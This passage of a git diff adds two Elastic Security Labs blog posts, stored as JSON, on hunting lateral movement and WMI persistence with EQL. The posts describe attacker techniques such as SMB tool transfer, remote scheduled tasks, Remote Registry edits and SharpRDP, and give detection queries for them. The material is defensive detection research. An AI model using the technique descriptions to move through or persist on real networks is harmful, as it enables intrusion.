Remotely triggering the execution (immediate or scheduled) of the staged program on the target host via accessible remote services and protocols ([Service](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f), [Task Scheduler](https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-start-page), [WinRM](https://docs.microsoft.com/en-us/windows/win32/winrm/portal), [WMI](https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page), [Remote Registry](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78)).\n4. Clean up the staged payload and any other relevant artifacts to avoid suspicion (optional)\n\nNote that staging a program (step 2) is not always necessary, as there are usually exposed services that allow for remote interaction with the target host, such as [PowerShell Remoting](https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1) and [Remote Desktop (RDP)](https://docs.microsoft.com/en-us/windows-server/remote/remote-desktop-services/clients/remote-desktop-clients).\n\n## **Lateral Tool Transfer**\n\nFiles may be copied from one system to another to stage adversary tools or other files over the course of an operation. A commonly abused vector is [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1570/) via the use of built-in system commands such as copy, move, copy-item, and others:\n\n\n\n_Figure 1: File copy via system command_\n\nFrom the source machine, there are alternative methods of copying the file without having to execute suspicious commands. 
Still, it’s important to look for low-hanging detection opportunities.\n\nFigure 2 below shows an EQL query that looks for the following behavior that is consistent with an attacker transferring a file to a remote host:\n\n- Execution of a command interpreter with a [process.args](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-args) keyword array related to file copy (copy, move) and a hidden file share (suffixed with a $ sign, such as c$ or admin$)\n- Staging data from a shadow copy volume (often associated with credential access via staging of [NTDS.dit](https://attack.mitre.org/techniques/T1003/003/) or [Registry SAM](https://attack.mitre.org/techniques/T1003/002/) key to access stored account password hashes)\n\n\n\n_Figure 2: Hunting EQL for file transfer via hidden file share from source machine_\n\nOn the target machine, we’ve observed that all files copied via server message block (SMB) are represented by a file creation event by the virtual process System (always has a static [process.pid](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-pid) value equal to 4 and represents the Windows kernel code and loaded kernel mode drivers):\n\n\n\n_Figure 3: File creation event details depicted in Kibana’s Discover view as a result of file transfer over SMB_\n\nA file creation event alone is not enough to conclude that this activity pertains to a Lateral Movement attempt (the System process may also create files that are related to local activity). 
Thus, we need to correlate it with _incoming_ SMB network events by the same process:\n\n\n\n_Figure 4: Hunting EQL for file transfer via hidden file share from target host_\n\nThe above query looks for an incoming remote network event to tcp port 445 (SMB) followed by immediate file creation or modification (can be limited to executable file extension to reduce false positives) and both events are performed by the same ([process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id)) virtual System process.\n\n\n\n_Figure 5: Detection alert example for Lateral Tool Transfer from target host_\n\nThe above alert contains details about the file that was copied as well as the [source.ip](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip) address of the Lateral Movement activity. The same logic triggers on [PSExec](https://www.ired.team/offensive-security/lateral-movement/lateral-movement-with-psexec), a remote execution utility often abused by adversaries for the same purpose:\n\n\n\n_Figure 6: Lateral Tool Transfer triggering on PSEXEC from target host_\n\nWe can also leverage [EQL correlation](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) to capture instances where a file that was copied via SMB is immediately executed:\n\n\n\n_Figure 7: Hunting EQL for remote execution via file shares_\n\nThe above EQL looks for a [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) of events where a file is created/modified by the virtual System process followed by a process event where the [process.executable](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-executable) is equal to the [file.path](https://www.elastic.co/guide/en/ecs/current/ecs-file.html#field-file-path). 
Below is an alert example:\n\n\n\n_Figure 8: Detection alert for remote execution via file shares from target host_\n\nAnother example where file transfer over SMB can be abused for remote execution is copying a malicious executable, script, or shortcut to the [Startup folder](https://attack.mitre.org/techniques/T1547/001/) of a target host. This will cause the referenced program to be automatically executed when a user logs in, in the context of that user:\n\n\n\n_Figure 9: Hunting EQL for Lateral Movement via startup folder_\n\nBelow is an example of a detection alert for Lateral Movement via the [Startup folder](https://attack.mitre.org/techniques/T1547/001/):\n\n\n\n_Figure 10: Detection alert for Lateral Movement via startup folder_\n\n## **Remotely Scheduled Tasks**\n\nAdversaries may leverage scheduled tasks for remote execution — either via built-in system utilities such as schtasks.exe or directly via the [Task Scheduler API](https://docs.microsoft.com/en-us/windows/win32/api/_taskschd/), which may be stealthier because visibility is limited.\n\nBelow is an example of remote task creation via the [MoveScheduler](https://github.com/mez-0/MoveScheduler) penetration testing tool:\n\n\n\n_Figure 11: Lateral Movement via MoveScheduler_\n\nBoth schtasks.exe and direct usage of a custom implementation will cause a process to load the Task Scheduler COM API (taskschd.dll), followed by an outbound network connection where both the [source.port](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-port) and the [destination.port](https://www.elastic.co/guide/en/ecs/current/ecs-destination.html#field-destination-port) fall within the RPC dynamic port range (49152 to 65535), and both events come from the same [process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id), which can be translated to this [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) query:\n\n\n\n_Figure 12: Hunting EQL 
query for outbound task scheduler activity on source host_\n\nOf course, matches to this query can be related to scheduled task discovery as well. Below is an example of an alert where we can observe the username, source, and destination IP, as well as the process name used to perform a remote task activity:\n\n\n\n_Figure 13: Detection alert for Lateral Movement via Scheduled Task on source host_\n\nOn the _target_ host, we can hunt for remote scheduled task creation/modification via two options:\n\n1. Incoming [DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) (over TCP/IP) network event by the Task Scheduler service (svchost.exe) followed by a file creation of a task XML configuration file (C:\\\\Windows\\\\System32\\\\Tasks\\\\task_filename)\n2. Incoming [DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) (over TCP/IP) network event by the Task Scheduler service (svchost.exe) followed by a registry change of a task cache Action value (HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\\\{GUID\\}\\\\Actions)\n\nOption 1 provides us with the task name (equal to the [file.name](https://www.elastic.co/guide/en/ecs/current/ecs-file.html#field-file-name) of the changed/created file), and Option 2 provides us with the task action itself (equal to the base64 decoded data of the Action registry value where the task scheduler service caches the task action configuration):\n\n\n\n_Figure 14: Hunting EQL query for task creation on target host (Option 1)_\n\n\n\n_Figure 15: Hunting EQL query for task creation on target host (Option 2)_\n\nOption 2 has the advantage of providing details about the task action, which tend to be useful while triaging (set to execute a program from a [suspicious 
path](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_from_unusual_path_cmdline.toml), [LOLBAS](https://lolbas-project.github.io/) process, etc.).\n\n\n\n_Figure 16: Detection alert for Lateral Movement via Scheduled Task on target host_\n\nDecoding the registry Action base64 encoded data provides us with details about the created task action:\n\n\n\n_Figure 17: Base64 decoded data of the scheduled task action registry value_\n\n## **Remote Registry**\n\nAdversaries may leverage the Remote Registry service for defense evasion or remote execution. One simple scenario is to modify the Run registry key on a remote system to cause the execution of a program upon system startup or user logon:\n\n\n\n_Figure 18: Remote modification of the Run registry key via reg utility_\n\nWe can hunt for this behavior from the source machine by looking for the execution of reg.exe with process.args containing \\\\\\*, but the same action can be achieved via API calls, avoiding [process.command_line](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-command-line)-based detections.\n\n\n\n_Figure 19: Example of Reg.exe process execution event on source host_\n\nNote that Reg.exe does not perform any network connection — instead, it’s the virtual System process that issues an outbound network connection to the target host on port 445 ([DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) over SMB).\n\nOn the target host we can see the following sequence of key events:\n\n1. Incoming network connection on tcp port 445 ([DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) over SMB) by the virtual System process ([process.pid](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-pid) equal to 4)\n2. 
RemoteRegistry service process starts (svchost.exe with [process.args](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-args) containing the string RemoteRegistry)\n3. RemoteRegistry service process performs the registry change\n\n\n\n_Figure 20: Remote Registry-relevant events on target host_\n\nThe following [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) hunt can be used to correlate (2) and (3) by [host.id](https://www.elastic.co/guide/en/ecs/current/ecs-host.html#field-host-id) and [process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id) of the Remote Registry service:\n\n\n\n_Figure 21: Hunting EQL to detect Remote Registry modification via Regsvc on target host_\n\nIf we include (1) in the above [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) to capture the [source.ip](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip) address, it may trigger on unrelated incoming SMB connections, since the only common element between the three events is limited to the [host.id](https://www.elastic.co/guide/en/ecs/current/ecs-host.html#field-host-id) value.\n\n\n\n_Figure 22: Detection alert for Remote Registry modification via Regsvc on target host_\n\nAdversaries may attempt to achieve the same outcome via the Windows Management Instrumentation (WMI) registry provider ([StdReg](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov)), which behaves differently:\n\n1. 
WMI Service (svchost.exe with [process.args](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-args) containing the Winmgmt string) accepts an incoming [DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) (over TCP/IP) network connection where both [source.port](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-port) and the [destination.port](https://www.elastic.co/guide/en/ecs/current/ecs-destination.html#field-destination-port) fall within the RPC dynamic port range (49152 to 65535)\n2. A new instance of the WMI Provider Host (process.name equal to WmiPrvSe.exe with [user.name](https://www.elastic.co/guide/en/ecs/current/ecs-user.html#field-user-name) equal to Local Service or [user.id](https://www.elastic.co/guide/en/ecs/current/ecs-user.html#field-user-id) equal to S-1-5-19) is started\n3. The started WMI Provider Host loads the registry provider StdProv.dll module\n4. 
The WMI Provider Host performs the registry change\n\nWe can express the correlation of (1), (2), and (4) with the following hunting [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html):\n\n\n\n_Figure 23: Hunting EQL for Remote Registry modification via WMI on target host_\n\nIf logging of the StdProv.dll module loading is enabled, we can also add (3) to the [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) to reduce potential false positives:\n\n\n\n_Figure 24: Hunting EQL for Remote Registry modification via WMI on target host (library event)_\n\nBelow is an example of a detection alert where we can see the remotely modified registry details and the remote [source.ip](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip):\n\n\n\n_Figure 25: Detection alert for Remote Registry modification via WMI on target host_\n\n## **Sharp Remote Desktop**\n\n[SharpRDP](https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3) is a Lateral Movement tool that leverages the Remote Desktop Protocol (RDP) for authenticated command execution without the need for graphical interaction.\n\nOnce authenticated, SharpRDP sends [virtual keystrokes](https://docs.microsoft.com/en-us/windows/win32/inputdev/virtual-key-codes) to the remote system via a method called [SendKeys](https://docs.microsoft.com/en-us/windows/win32/termserv/imsrdpclientnonscriptable-sendkeys) to open up a [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/) on the target host and then enter a specified command, which will be executed on the target host.\n\nThe main indicator from the source host is an unusual process (hosting SharpRDP code) loading the Remote Desktop Services ActiveX Client that implements RDP client functionality (MsTscAx.dll), followed by an outbound network connection to RDP tcp port 3389, with both events from the same 
[process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id):\n\n\n\n_Figure 26: Hunting EQL for suspicious RDP Client_\n\nBelow is an example of results matching our hunting EQL where we can see an unusual process (other than mstsc.exe and similar known RDP clients) loading the Remote Desktop Services ActiveX Client (MsTscAx.dll) as well as the outbound network connection:\n\n\n\n_Figure 27: Results example for suspicious RDP Client EQL hunt_\n\nOn the target host, the following key events occur within a one-minute time window:\n\n1. An incoming network connection is accepted by the RDP service (TermService svchost.exe) on port 3389\n2. Under the [RunMRU](https://resources.infosecinstitute.com/topics/digital-forensics/understanding-critical-windows-artifacts-and-their-relevance-during-investigation-part-2/) registry key, a new string value (or an update to an existing one) is set to cmd, powershell, taskmgr, or tsclient (depending on the chosen SharpRDP [execution method](https://github.com/0xthirteen/SharpRDP)), which is caused by the typed command in the [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/) via the [SendKeys](https://docs.microsoft.com/en-us/windows/win32/termserv/imsrdpclientnonscriptable-sendkeys) method\n3. 
Depending on the execution [method](https://github.com/0xthirteen/SharpRDP), a new process (attacker command) is created with [process.parent.name](https://www.elastic.co/guide/en/ecs/current/ecs-process.html) of cmd.exe, powershell.exe, taskmgr.exe, or a random executable running from the [tsclient](https://www.virtualizationhowto.com/2016/07/map-network-drive-remote-desktop-local-computer/) mountpoint (shared drive from the RDP client host with the RDP target server)\n\nFor (2), note that when running anything from the [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/), a registry entry will be created at HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU showing what was entered into the [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/) box.\n\nThe above [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) of events can be expressed with the following [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html):\n\n\n\n_Figure 28: Hunting EQL for SharpRDP behavior on the target host_\n\nExample of a detection alert and its composing event details on the target host:\n\n\n\n_Figure 29: Detection alert for SharpRDP on target host (TermService network connection)_\n\n\n\n_Figure 30: Detection alert for SharpRDP on target host (RunMRU set to Powershell)_\n\n\n\n_Figure 31: Detection alert for SharpRDP on target host (PowerShell child process)_\n\n## **Wrapping up**\n\n[Event Query Language (EQL)](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) correlation capabilities enable us to capture complex behavior for a variety of Lateral Movement techniques. The high-level steps are:\n\n1. **Understand the theory** and the building blocks of a certain technique (network protocols, loaded modules, services, process names, and arguments)\n2. 
**Identify the key events** and their order that compose a certain behavior (both source and target host)\n3. **Identify the common values** that can be used for correlation ([sequences](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences)) — identifying more commonalities can reduce false positives\n4. **Identify enrichment possibilities**, such as extra events in the sequence that can be useful during alert triage\n5. **Assess the window of time** for correlation — using a shorter time window (for example, 30 seconds instead of 1 minute) can reduce false positives, but can also introduce false negatives caused by network latency or a slow system\n6. **Test using different methods and tools** and tune the hunting logic accordingly, or, in some instances, duplicate logic to capture edge cases\n\nSome of the [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) detection rules used as examples can be found in the [Elastic detection-rules](https://github.com/elastic/detection-rules) repository:\n\n- [Remote File Copy to a Hidden Share](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml)\n- [Lateral Tool Transfer](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_executable_tool_transfer_smb.toml)\n- [Remote Execution via File Shares](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml)\n- [Lateral Movement via Startup Folder](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml)\n- [Outbound Scheduled Task Activity via PowerShell](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_scheduled_task_powershell_source.toml)\n- [Remote Scheduled Task 
Creation](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_scheduled_task_target.toml)\n- [Potential SharpRDP Behavior](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_rdp_sharprdp_target.toml)\n- [Suspicious RDP ActiveX Client Loaded](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_suspicious_rdp_client_imageload.toml)\n- [Execution via TSClient Mountpoint](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_execution_from_tsclient_mup.toml)\n\nIf you’re new to [Elastic Security](https://www.elastic.co/security), you can experience our latest version on [Elasticsearch Service](https://www.elastic.co/elasticsearch/service) on Elastic Cloud.\n"
+ },
+ "title": "Hunting for Lateral Movement using Event Query Language",
+ "slug": "hunting-for-lateral-movement-using-event-query-language",
+ "date": "2023-03-01",
+ "description": "Elastic Event Query Language (EQL) correlation capabilities enable practitioners to capture complex behavior for adversary Lateral Movement techniques. Learn how to detect a variety of such techniques in this blog post.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "blog-thumb-security-honeycomb.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-hunting_for_lateral_movement_using_event_query_language-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_1-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_1-md.json
new file mode 100644
index 00000000000..1175140a1d9
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_1-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1)\"\nslug: \"hunting-for-persistence-using-elastic-security-part-1\"\ndate: \"2022-06-01\"\ndescription: \"Learn how Elastic Endpoint Security and Elastic SIEM can be used to hunt for and detect malicious persistence techniques at scale.\"\nauthor:\n - slug: david-french\n - slug: brent-murphy\n - slug: elastic-security-intelligence-analytics-team\nimage: \"blog-thumb-security-breach-red-lock.jpg\"\ncategory:\n - slug: adversary\n---\n\nLast month, we hosted a webinar, [Hunting for persistence using Elastic Security](https://www.elastic.co/webinars/hunting-for-persistence-using-elastic-security), where we examined some techniques that attackers use in the wild to maintain presence in their victim’s environment. For each technique covered, we explained:\n\n- How the offensive technique works\n- Why the technique is often successful for attackers\n- How defenders can hunt for and detect the malicious behavior effectively using [Elastic Security](https://www.elastic.co/security)\n\nIn this two-part blog series, we’ll share the details of what was covered during our webinar with the goal of helping security practitioners improve their visibility of these offensive persistence techniques and help to undermine the efficacy of these attacks against their organization.\n\nPart 1 will explain what persistence is and why attackers need it. We’ll introduce the Event Query Language (EQL) before showing its practical use cases for threat hunting. We will examine a popular technique used by adversaries to maintain persistence, Windows Management Instrumentation (WMI) Event Subscription ([T1084](https://attack.mitre.org/techniques/T1084/)). 
We’ll also share how Elastic Security users can hunt for and detect this technique being used in their environment.\n\nIn part 2, we’ll explore two additional persistence techniques that are being used by attackers in the wild: BITS Jobs ([T1197](https://attack.mitre.org/techniques/T1197/)) and Scheduled Tasks ([T1053](https://attack.mitre.org/techniques/T1053/)). This follow-up post will walk through real world examples of these techniques being used and how we can hunt for, detect, and prevent them using Elastic Security.\n\nThe Protections team at Elastic Security is responsible for researching, understanding, and developing detections and preventions for attacker behavior in order to stop attacks before damage or loss occur. For organizations that do not have a full-time security operations team, Elastic Security includes out-of-the-box protections against adversary tradecraft, malware, and attacks like ransomware and phishing.\n\n## What is persistence and why do attackers need it?\n\nWhen we consider the common components of an intrusion, such as those depicted in Figure 1, the attacker may have spent a considerable amount of effort carrying out reconnaissance, obtaining initial access to, and establishing a foothold in their target environment. Generally speaking, an adversary will often want to maintain a presence in order to survive disruptions to their access like system restarts or user password changes. An effective persistence mechanism will execute the attacker’s malicious code on a regular basis or when a specific condition is met such as a user logon or application launch event.\n\nIn many cases, gaining access to an organization’s network is harder than maintaining persistence. It is for this reason that attackers continue to use the persistence techniques covered in this post — with largely successful results. 
When the security industry refers to “dwell time,” that's the period of time that begins when an adversary gains access to a system and ends when you detect them. Persistence facilitates longer dwell times, during which the adversary can work to achieve their objectives.\n\n\n\nThere are currently [63 persistence techniques](https://attack.mitre.org/tactics/TA0003/) documented in the [MITRE ATT&CK®](https://attack.mitre.org/) knowledge base of adversary behavior. This number can seem daunting at first, but an adversary’s need for persistence can be their Achilles’ heel, providing defenders with valuable opportunities to detect and remove an attacker from their environment.\n\nBy learning these offensive tactics, techniques, and procedures (TTPs) and baselining the endpoints and network activity in your environment, you have an opportunity to detect attackers early on in an intrusion before any damage or loss occurs. Security operations teams work tirelessly to detect the techniques captured in the ATT&CK matrix — hunting and writing alert logic to provide the greatest visibility and coverage of their enterprise. To help reduce the barrier to entry and enable those teams, we created EQL and released it to the community.\n\n## What is Event Query Language (EQL)?\n\nThe queries in this blog post, which can be used for threat hunting and detection, are written in EQL — a powerful and intuitive query language that makes it easy for practitioners to search for complex adversary behavior.\n\nTo learn more about EQL, you can read the [Getting started with EQL](https://www.elastic.co/blog/getting-started-eql) blog post or review the [EQL Analytics Library](https://eqllib.readthedocs.io/en/latest/analytics.html), which contains 200+ free security analytics mapped to the techniques documented in the MITRE ATT&CK matrix. 
EQL is a core component of Elastic Endpoint Security and [is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581) for use in Elastic SIEM.\n\nLet’s now analyze the WMI Event Subscription technique used by attackers in the wild by demonstrating a variety of methods to hunt for and detect this technique. We decided to cover this technique given its popularity among attackers and the low detection rates by traditional security controls.\n\n## Persistence via Windows Management Instrumentation (WMI) Event Subscriptions (T1084)\n\n[WMI](https://docs.microsoft.com/en-us/windows/win32/wmisdk/about-wmi) is the Microsoft implementation of Web-Based Enterprise Management (WBEM), a collection of technologies used to manage information and systems in enterprise environments. WMI is a built-in feature of Windows endpoints that allows both administrators and attackers to interact with and manage many different functions of the operating system. Components such as network interfaces, power settings, service status, and installed software or patches can all be queried and managed via WMI.\n\nAttackers have been abusing WMI since as early as 2008 to accomplish different objectives such as moving laterally between endpoints, enumerating what processes are running on an endpoint, and maintaining persistence. 
An attacker can “live off the land” by abusing built-in features of the operating system, which often results in a lower risk of detection than if they introduced malware into a victim environment.\n\nIt's no secret that adversaries prefer WMI-based persistence because:\n\n- Many organizations are incapable of monitoring or investigating WMI\n- Out-of-the-box WMI visibility is limited, and a third-party utility may be required to effectively convey how WMI is being used\n- WMI is an integral component of Windows, and the volume of weak signals from this data source can overwhelm analysts who aren't familiar with these attack types\n\nAs with most offensive techniques, until organizations can reliably detect WMI abuse, adversaries are unlikely to change their behavior.\n\n### Understanding WMI Event Subscriptions and how they can be abused\n\nSimply put, a WMI Event Subscription can trigger an action when a certain condition is met. A WMI Event Subscription consists of three components:\n\n- EventFilter - specifies a condition that you test for, e.g. a user successfully authenticates, a particular time and day of the week occurs, etc.\n- EventConsumer - specifies an action to execute when the EventFilter condition is met, e.g. execute a Windows command or script, delete all Volume Shadow Copies, restart a service, etc.\n- FilterToConsumerBinding - this links an EventFilter to an EventConsumer instance\n\nFigure 2 below shows the output from Sysinternals Autoruns, a free tool from Microsoft that can be used to examine various persistence locations on Windows endpoints, also referred to as Autostart Execution Points (ASEPs). Autoruns reveals a persistent WMI Event Subscription, named checkforupdates. It is important to note that there are sometimes benign WMI Event Subscriptions configured, but there shouldn’t be many. 
Alerting on the creation of new WMI Event Subscriptions and hunting for new ones periodically can be a low-cost, high-reward exercise.\n\n\n\nThe full WMI Query Language (WQL) query from the Autoruns results is shown below. Autoruns conveniently enumerated the WMI \\_\\_EventFilter class for us in the root\\Subscription namespace where this malicious entry was created. Interpreting this WQL query, the EventFilter condition will be met when the system’s uptime is between 240 and 325 seconds. The EventConsumer is an [Empire](https://github.com/EmpireProject/Empire) PowerShell script and will execute when this EventFilter condition is met.\n\nTo summarize, a WMI Event Subscription has been configured to execute a malicious PowerShell script shortly after the endpoint boots up. This enables the attacker to maintain persistence in the victim’s environment and survive system restarts.\n\n```\nSELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND\nTargetInstance.SystemUpTime >= 240 AND\nTargetInstance.SystemUpTime < 325\n```\n\n_Figure 3 - WMI Query Language (WQL) query showing WMI EventFilter condition_\n\n### Hunting for and detecting malicious WMI Event Subscriptions\n\nThe EQL query in Figure 4 shows how we can search for a sequence of three WMI events, which were generated by the same unique process ID (PID). This query demonstrates one of the strengths of EQL by using the join function. This allows us to match sequences of events in any order. Searching for these three WMI events without binding them together by unique PID might not return meaningful results. This query matches when a WMI EventFilter, EventConsumer, and FilterToConsumerBinding are created by the same process in succession, which typically occurs when malware is executed and creates a new WMI Event Subscription for persistence. 
This query can be used to monitor for and detect abuse of WMI.\n\n```\njoin by unique_pid\n [wmi where properties.Operation == \"*IWbemServices::PutInstance*EventFilter*\"]\n [wmi where properties.Operation == \"*IWbemServices::PutInstance*EventConsumer*\"]\n [wmi where properties.Operation == \"*IWbemServices::PutInstance*FilterToConsumerBinding*\"]\n```\n\n_Figure 4 - EQL query to search for the creation of a WMI EventFilter, EventConsumer, and FilterToConsumerBinding in succession_\n\nThe above EQL query can be saved as a custom rule in Elastic Endpoint Security so that analysts can be alerted every time a new WMI Event Subscription is created by a process (Figure 5).\n\n\n\nResolver is the primary interface for interacting with alerts in Elastic Endpoint Security and enables users to visualize process ancestry along with relevant events such as DNS, file, network, WMI, and PowerShell, to name a few. It also provides one-click response actions to resolve the alert.\n\n\n\nClicking the WMI event type next to powershell.exe in Resolver enables users to review the WMI events that were generated by the process. Figure 7 shows the WMI event that was logged when powershell.exe was used to create the new WMI FilterToConsumerBinding, checkforupdates.\n\n\n\nElastic Endpoint Security also includes template-based hunts that lower the barriers to entry for less experienced analysts and allows for the easy collection and analysis of data across an organization’s endpoints. There are currently 25 categories of persistence data that can be collected and analyzed using template-based hunts.\n\n\n\nOnce a hunt has been executed, there are several ways to sort or aggregate the data — such as by frequency or file path. This helps analysts to quickly baseline their endpoints and identify anomalies to investigate further.\n\nFigure 9 depicts the filtered results of a persistence hunt wherein the same malicious WMI Event Subscription was configured. 
Elastic Security enumerates persistence locations across your endpoints and enables users to apply filters to identify anomalies or suspicious artifacts for further analysis. Hunt teams will often assume that traditional passive and reactive security controls are fallible, and will proactively hunt for malicious persistence mechanisms in search of attackers operating in their environment.\n\n\n\nElastic Security comes with out-of-the-box detections for WMI abuse. Figure 10 shows the signal that was generated by Elastic Endpoint and shipped to Elastic SIEM when a malicious WMI Event Subscription was created.\n\n\n\nUsers have the option to view a signal in the Timeline within Elastic SIEM. Timeline enables analysts to search for similar activity across their data, gather and document evidence, and forward potential incidents to ticketing and SOAR platforms with ease. Part 2 of this series will show the workflow and features of Timeline.\n\n\n\nAs of version 7.6 of the Elastic Stack, the SIEM app comes with a detection engine, which enables security teams to create their own custom rules. For example, Windows 10 logs Event ID 5861 when a new WMI FilterToConsumerBinding is created. Figure 12 shows how a custom rule can be created in Elastic SIEM to search the winlogbeat-\\* index pattern for winlog.event_id: 5861. We can configure a description, severity, and risk score for the new rule, as well as map the rule to the relevant techniques in the MITRE ATT&CK matrix. This information will help an analyst triage and determine the steps to take when the rule condition occurs.\n\n\n\nElastic SIEM is part of the Basic subscription and currently includes 92 detections that utilize Windows, Linux, network, and APM logging. 
We will continue to add new rules in new releases of the Elastic Stack.\n\n\n\nIn this section, we learned how WMI Event Subscriptions can be abused for persistence and how we can hunt for and detect this technique using the combination of Elastic Endpoint and SIEM. It’s important to note that we have only scratched the surface of how WMI works and the many ways that it can be used by attackers.\n\nWMI can be used during every phase of an attack, such as moving laterally between endpoints, conducting local and enterprise reconnaissance, and stealing data. Elastic Security has released detections for many techniques that leverage WMI.\n\n## Conclusion\n\nIn this blog post, we examined a popular technique that attackers use to maintain a presence in their target environments. The number of techniques in an attacker’s arsenal can seem daunting at first, but we demonstrated a formulaic approach to examining, hunting for, and detecting techniques effectively. By building comprehension around adversary tradecraft, you can identify interesting patterns, behaviors, and artifacts that you can use to your advantage.\n\nElastic Security makes hunting for persistence easy. The features of Elastic Endpoint Security and SIEM (along with the protections provided out of the box) lower the barriers to entry for analysts, provide detailed visibility into endpoint activity, and enable organizations to prevent, detect, and respond to malicious behavior at scale.\n\nTo learn more about threat hunting, download a free copy of [The Elastic Guide to Threat Hunting](https://ela.st/threat-hunting).\n\nPlus, [EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581)!\n"
+ },
+ "title": "Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1)",
+ "slug": "hunting-for-persistence-using-elastic-security-part-1",
+ "date": "2022-06-01",
+ "description": "Learn how Elastic Endpoint Security and Elastic SIEM can be used to hunt for and detect malicious persistence techniques at scale.",
+ "author": [
+ {
+ "slug": "david-french"
+ },
+ {
+ "slug": "brent-murphy"
+ },
+ {
+ "slug": "elastic-security-intelligence-analytics-team"
+ }
+ ],
+ "image": "blog-thumb-security-breach-red-lock.jpg",
+ "category": [
+ {
+ "slug": "adversary"
+ }
+ ]
+ },
+ "id": "security_labs_content-hunting_for_persistence_using_elastic_security_part_1-md",
+ "type": "security_labs_content"
+}
